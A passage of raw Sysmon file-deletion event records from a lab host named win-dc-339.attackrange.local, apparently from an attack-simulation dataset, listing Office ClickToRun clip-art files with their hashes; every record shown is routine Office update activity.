Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH02282_.WMFMD5=DA8C7EAEAA94CBAC4997AD49B5B13D78,SHA256=D4EC1DC787164A8414C3D1689C0336047899561761DFAC9F303429831C045F79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH02166_.WMFMD5=951E5C6E20CC20E5E76AEFEB0BBBE79C,SHA256=D9200E0B4DE870AF9DF703F2F69EF8C136B668F0EB622C094A1CF843C13E1B21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH02155_.WMFMD5=7E1C605B5CD9313FDB47379F5DF3ECD4,SHA256=26D322B56B2E13CF381AF9256CF70197162F08A843A4B1D7D625F05E1BFB2143,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH01923_.WMFMD5=92A4332A034DF02DE382E2AC54DDF935,SHA256=7F95C14090B1D5A1A354FEAAEF04EAFD35ED5CB26D69220EB54804E09302988E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH01875_.WMFMD5=AB48EEF5FBEA6842B51DC20F07BFE220,SHA256=01AA74342629DC184A25D337CD3FF6BD41F302F5BFDF37BB19B277BBBDC5D5A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH01759_.WMFMD5=76F7B4E118CEB4551423B11F829FDCD1,SHA256=65260388597675863D6C24C3EF01F1516308EF319BCBF1872969F6EC80EEB7B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH01618_.WMFMD5=D6BC96E72288B61F7E2CB82A26C432D3,SHA256=508DCD28CD237F346B0B2202011B76BAC187FA5134DA05C6738A33820E3F6EF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH01461_.WMFMD5=563BC702A0EDE3B675AFEFDA7CE678CA,SHA256=D7944585C2F800BA0E9C0C391D2D53B306CB792DE0F710B3ECF385F2D62938E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH01329_.WMFMD5=0DADFD5325F0E57E84A506C5E446B613,SHA256=790121DDCC49A8463D472877A1BDEF9FC205107E6634BDA3E8D7F1547588A24A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH01291_.WMFMD5=DF7E69214C9294BE5A884952280B87B1,SHA256=F04F41B8D692F9C1CFBCABA4E5BDEBFCF8846BB9DC7A4D09B56A6909707BA519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH01242_.WMFMD5=041348E80E673ED2CD5DBD5953B55F1F,SHA256=E1CC4CBACBBC0825F0329408442C2DFB49D2A55CCD590102D4E2033920A254B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH01080_.WMFMD5=356D68FB5FCD0558BFDF68BAD08F81EB,SHA256=DB88AFC96509077DC77E39BB909F357E55F98E7EB3DB5B8ADF10CC45D84D33E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH01065_.WMFMD5=11119F06A646959ACCF46F2B6F159509,SHA256=07DA086AA209F92A803DCF713A5681F3376E97CF6D9460A1050AD76DB54A4D37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH01058_.WMFMD5=635842DC5850A236093AC2DCB76C6960,SHA256=B7B6E27774612114FE394D23B6C2254D8C94F047B483FE631D187519B6E2ADDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH01015_.WMFMD5=2F7666BC57A2647F0793F880264024DB,SHA256=C2EFB61E65E4298CC30EB5A8DC452D92978AFF3B91C68E6E12DC53610F90FAB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH01013_.WMFMD5=805BBBEFC12D6BD104491359EE634F44,SHA256=19081CDE246CDFB70736D8E47A58EE4756817055E90BF52306128B6BD70C34FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00693_.WMFMD5=C9864091EF3934C0293075A39756CA9A,SHA256=02E1616952D7A94E45EC1B00480F7F44041EC8314BF7D2927328E14FB30DD697,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00688_.WMFMD5=8BE95DAADB68DA6584213F9D59074DFB,SHA256=BB761A0A9895CA3963B8C3EAB5CFAFFF5EA0B6DBFE1FE7D7233EA97CE9054371,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00687_.WMFMD5=ACFA9AC5D919D1DC85A06CFE17EA95B5,SHA256=8ECCEBA07CC3DD0371CFFB1026E9ACFCAFC1ED4FFC4EC5B6C665060EDC654548,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00685_.WMFMD5=23575EE603E7D8CD2FCAFDDA306BB651,SHA256=BBD8EA8C01A57CE01CF3254ACE3F87D8F46E5FB2E0973FE66955AB29293A72D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00681_.WMFMD5=1967B5957C45F16EB1572199AF8A462C,SHA256=DF10E0B1F88A206F21679A69ED71BC546B8982DDDC7EE02A611AECEF231600C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00669_.WMFMD5=4DEF28B764B9988A4A7AB3CCB75C8F3E,SHA256=1B7405F53D88619CF4974C80AD70EE2DF65D52341C62802FDD34E1455C74272C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00636_.WMFMD5=10D696C712605657C7506812432AF542,SHA256=594232BC077CE06DE8E2A3D9A2F2C29A75A6AEB601E4FB747BDE209FF0BA82FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00625_.WMFMD5=F11D7FEEB3FE068561B1B10B7F31A627,SHA256=4043FFAFEA8AED993D26A2ED294241AE20259519E8FAFAA4059BFD7718E93A28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00623_.WMFMD5=059EA2875212F254AAFF902810BB6187,SHA256=7214995F65FF42CF3BB69FEF8F23707448CB602B54A8C190FE20493CFAD41347,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00612_.WMFMD5=DA3F0BFA7E82E801F494AB8ADF098515,SHA256=CB19926736540EB4DE8229C165FEFC998FAF5507AB3076CE6DC72DB09A5ADC5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00602_.WMFMD5=1896BA6253E83280FA1A72733891FA2E,SHA256=0FCBE303AF5494870A84C9BC26048E25E5613D0F169D127CF7E7E9EEFBDA77A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00601_.WMFMD5=2944962137128696927FCFAAD0A905B2,SHA256=5FA66E6B3DE7E6064FCA9F399B60282316DFAE273496345042A99892641AFD20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00546_.WMFMD5=B5A7198B713FDF0064007E3F3D811BF5,SHA256=F4C08392F821394D01F0B491803A6AE7D5C8062FBEFF0F3F480694F2E876EA6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00527_.WMFMD5=3E5252AE5BBB7E51076D21176526CEEA,SHA256=26233B868C5F6E7CEC85E303118D6735EC9B40830D1A1B2DB57218CEBE8CD537,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00526_.WMFMD5=0C78E787EFB858601F1566D010660BB0,SHA256=A5FC79DC2E6E69CA74D8D0B030425F932DDAA531B1FF2B54778D442383BFAF1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00524_.WMFMD5=B500BB4EDD7E951784DBFB91F8BECDE2,SHA256=FE50311C36F2B5B3FE9B9B6022FC69F68BCA3252431C6001B798261CB4E539CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00513_.WMFMD5=D2A53876A98AB4055A04F55EB512CBF0,SHA256=7F603C1BAE169A4629D64373C8F23D57E6D40786D8708657099BB8ACEEA073E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00443_.WMFMD5=CB88FD533A10BFD0A56BFE85890530EE,SHA256=0A62475D905E35443DE82C00941CCEE8E6045C35A305B8D3A9D389CF976B64D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00334_.WMFMD5=314911F5F9737FCCBA6D46BCE14B79C4,SHA256=C743A992F35FDC8406D6CBF8C2D765A98B35F8F8B2D7982DB447A85A33298398,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00276_.WMFMD5=3576998BC6AFC968669F63C95EA5BD1F,SHA256=78E2154226E6B15B45D337C570C493A97629661D7C6185F0EAD6D8D84D78E8B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00260_.WMFMD5=EB1804B36BBDB3632D83CA2DA71A4D81,SHA256=2D9781CFCE5A8DBDA5EE176276D9FB5F10194BE716B79A48E36DB86D5796CAD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00241_.WMFMD5=C4EE88ECAD7FD1190181834080A2188B,SHA256=F3C512D486766F91560EF2A47B9B6A6ABD10A143EDBE3F0A049278A31787EF99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00236_.WMFMD5=0268F37A7800F8743F39B946AD3282F2,SHA256=FA8F7014724D41B2935B00C1F640060C9A21C4FF1AA1EF8EBA9368AA367DC780,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00235_.WMFMD5=82F181F16AFDC303497374216A8ADE38,SHA256=25BBD73CAC74D9FD4AA57EEF283C0D41E2A27A5FF19DE2EBA1CAF3237C564603,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00231_.WMFMD5=BB71569957A06259D1CC1A716B892283,SHA256=A213AF74B57AFD57E01E720885D5C0CDD7213CA29FFD1287A865B33FA835EC4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00084_.WMFMD5=AD6192939EE170127253C11914E0E38F,SHA256=FF567E24D6D7BD176A134263798F55E2EC103E48D57ECB3529FCF3B3A7D0B901,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH00057_.WMFMD5=911C5829B0D0A8E91670509E22D74921,SHA256=FA9BD8D1058C413ACE291914E879BAD0EE749508D11921193E7677F0CE23ACC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\GRID_01.MIDMD5=BD633215A6A9C445BC70EC092B7E8635,SHA256=AB23D6398D78C5323D383E9C13C650652AD3678CBCEF82EA2834B09F5E6EB007,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\GRDEN_01.MIDMD5=EBF06B1BDA3ADE032ADE1AA2D26A132D,SHA256=B4EB9A85C68595030E318609BF2D5A624DB654A07A2B9259E1FE6A20BCDF4FC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program 